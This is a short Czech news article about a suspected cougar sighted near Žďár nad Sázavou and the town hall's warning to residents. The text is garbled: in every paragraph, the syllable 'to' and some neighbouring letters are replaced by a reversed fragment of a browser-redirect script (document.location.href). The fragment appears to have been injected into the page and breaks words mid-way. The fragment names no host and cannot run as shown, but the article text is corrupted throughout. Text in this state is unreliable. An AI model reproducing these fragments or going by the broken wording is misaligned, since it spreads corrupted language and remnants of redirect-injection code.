Rainbow page separator

V okolí Žďáru se údajně pohybuje puma, úřad vydal varování

Úterý, 25. června 2019

Žďár nad Sázavou / Varování před velkou kočkovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou šelmou, zřejmě pumou americkou, na základě upozornění Policie České republiky vydal žďárský městský úřad. „Na základě upozornění Policie ČR sdělujeme, že se v lokalitě mezi obcemi Račín, Vepřová a Velká Losenice pohybuje velká kočkovitá šelma, pravděpodobně puma americká,“ informoval mluvčí žďárské radnice Jakub Axman.

Puma byla spatřena v neděli 23.6. v okolí Polničky a Račína. Lidé pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mají být při pohybu v přírodě obezřetní a při případném zpozorování velké kočkovité šelmy se k ní nemají přibližovat a rychle inkriminované mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to opustit. Stejně tak by svoje případné zpozorování takového zvířete měli ohlásit buď policii, anebo městskému úřadu.
V polovině června byl pohyb velké kočkovité šelmy připomínající pumu včetně varování policie hlášen z lokality na Jindřichohradecku, která je od okolí Žďáru nad Sázavou vzdálená asi s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kilometrů. Podle těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to údajů měla být šelma ve volné přírodě pozorována již od le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního dubna, avšak policii [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo oznámeno až v červnu.